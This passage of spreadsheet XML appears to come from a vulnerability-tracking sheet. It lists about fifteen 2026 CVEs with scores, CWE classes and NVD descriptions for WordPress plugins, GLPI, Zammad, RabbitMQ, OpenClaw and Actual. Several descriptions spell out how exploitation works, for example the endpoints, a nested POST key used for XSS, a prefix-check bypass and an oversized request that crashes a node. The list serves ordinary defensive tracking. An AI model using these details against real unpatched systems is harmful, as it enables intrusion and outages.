          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>The Restaurant Menu and Food Ordering plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'phone_number' parameter in all versions up to, and including, 2.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96568</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96752</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>The Zero Spam for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Nested POST Array Keys via Contact Form 7 Integration in all versions up to, and including, 5.7.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The payload is delivered by submitting a Contact Form 7 request with a nested POST array key containing arbitrary HTML or JavaScript — PHP parses the field name into a nested array key, which is stored verbatim in the zerospam_log.submission_data column when Zero Spam flags the submission as spam due to the absence of the zerospam_david_walsh_key field.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96752</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97060</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 lacks object-level authorization in user management endpoints, allowing sub-administrators to modify or delete users without ownership verification. Attackers with user-management permissions can reset passwords for any account including the super administrator, rebind roles, or delete users via POST /sys/user/update and POST /sys/user/delete endpoints.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97060</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100555</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed gateway application. In versions &gt;= 2026.7.1 and &lt; 2026.8.1, Synology Chat attachment delivery could lose DNS pinning: the Gateway validated a single DNS result for a supplied file URL but then passed the original hostname to the Synology NAS, where it could resolve to a different destination. When attachment delivery accepted a remotely influenced hostname, an attacker could use DNS rebinding to make the NAS fetch a private or otherwise policy-denied resource and return its contents to the addressed conversation (server-side request forgery). Practical impact depends on NAS routing, resolver behavior, and the response available at the private destination. The issue is fixed in 2026.8.1; as a workaround, disable remote URL attachment forwarding in Synology Chat.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100555</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100598</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr">
        <is>
          <t>npm, react</t>
        </is>
      </c>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package openclaw) before 2026.7.1 incorrectly binds Signal approval reactions. In affected versions, a reaction intended to resolve a structured approval request could instead attach to ordinary outbound text when unrelated outbound messages and a pending approval are present in the same conversation. As a result, an approver's reaction to unrelated text could be interpreted as approving or denying a pending host action; the practical impact depends on the pending request, conversation timing, and the actions available to the OpenClaw process. The issue does not change the authority of correctly identified approvers. This is fixed in version 2026.7.1.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100598</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53626</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.5 until 11.0.8, under certain conditions, permission logic can grant access to a document without confirming that the document is linked to the targeted item. A user can use an unrelated item that the user is permitted to view to read a document linked to an inaccessible item. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53626</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53629</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 9.4.0 until 10.0.26 and 11.0.8, an attacker with the READ right on logs can craft a URL for the history tab that injects attacker-controlled values into a database query. This permits SQL injection through the history tab endpoint. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53629</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56723</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, a customer who can view a ticket cannot see internal ticket articles through the article listing API. However, the same customer can directly request an attachment belonging to an internal article via the attachment download endpoint, bypassing article-level authorization. This results in an inconsistency: The article listing hides internal articles from customers. The attachment download only checks the parent ticket, not the article, so the same customer can download the attachment directly. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56723</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56724</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, summary An issue with permission checks in the knowledge base management area has been identified. Under certain conditions, data validation for linked items was not fully enforced. This could have allowed users with limited read permissions to interact with items outside their assigned access scope. Data access has been strengthened in the current version through additional validation routines. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56724</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56727</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-347, CWE-391</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, summary In Zammad's inbound PGP email processing, the return value of the gpg verification call was silently discarded. Regardless of whether gpg reported a valid, invalid, or missing signature, the handler unconditionally wrote sign: { success: true, comment: "Good signature" } to the article's security preferences. Impact Any sender could tamper with the body of a multipart/signed PGP email, or craft a message with an entirely fabricated or mismatched signature, and Zammad would display it to the recipient as cryptographically verified with a "Good signature" label. Users and agents relying on Zammad's signature indicator to confirm message authenticity and integrity would be misled into trusting modified or forged content. The vulnerability affects all inbound PGP-signed emails processed while the PGP integration is enabled. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56727</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57449</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr">
        <is>
          <t>github, requests, gin</t>
        </is>
      </c>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284, CWE-863</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>Actual is a local-first personal finance tool. Prior to 26.7.0, Actual Sync Server's CORS proxy is intended to let authenticated users fetch resources only from repositories listed in the official plugin allowlist. When `ACTUAL_GITHUB_TOKEN` is configured, the proxy automatically attaches the server's GitHub token to GitHub requests. The GitHub API allowlist check uses a raw `startsWith()` prefix test for `/repos/{owner}/{repo}` without requiring a path boundary after the repository name. If an allowlisted public plugin repository is `https://github.com/acme/plugin`, the proxy also accepts GitHub API URLs. Those URLs are outside the allowlisted repository but still pass because their API path starts with `/repos/acme/plugin`. The proxy then forwards the request with the server's `ACTUAL_GITHUB_TOKEN`, allowing any authenticated Actual user to read private GitHub resources reachable by that token. Version 26.7.0 fixes the issue.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57449</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67408</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr">
        <is>
          <t>docker, requests, gin</t>
        </is>
      </c>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.1.0 until 4.3.3, 4.2.9, and 4.1.11, Stream Management Super-Stream Binding Keys Allocation Allows Low-Privilege Node Denial of Service. rabbitMQ 4.3.1 with rabbitmqstreammanagement enabled accepts PUT /api/stream/super-streams/{vhost}/{name} requests from an authenticated management user that can access the target vhost. When the request body contains the binding-keys field, the handler parses the attacker-controlled comma-separated string and builds the full stream-name list before checking whether the user has permission to configure the resulting streams. A low-privileged management user with vhost access but no configure, write, or read permission can therefore force large transient allocations before the resource permission check. In a 768 MB memory-limited container, one HTTP PUT with about 4.5 MB of JSON body killed the RabbitMQ container with Docker state exited true An authenticated low-privileged management user can kill a memory-limited RabbitMQ node with one HTTP This issue is fixed in versions 4.3.3, 4.2.9, and 4.1.11.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67408</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67419</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-407</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. Prior to 4.3.5, an authenticated user who can bind a queue to a topic exchange and publish to it can use consecutive # segments in a binding key to make both topic matchers revisit the same trie-node and routing-key-suffix states without memoization. The matcher materializes duplicate destinations before deduplication, causing combinatorial CPU work and memory pressure that can disrupt routing for all tenants. This vulnerability is fixed in 4.3.5.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67419</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84464</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, zammad's External Data Source feature, used to look up records from an external system, did not properly verify whether a user was allowed to see a specific ticket, user, group, or organization before including its details in a request to that external system. An authenticated user, including one with only basic customer access, could exploit this by referencing another record's ID, and thereby view details of tickets, customer accounts, teams, or organizations that did not belong to them. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84464</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84465</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-295, CWE-347</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
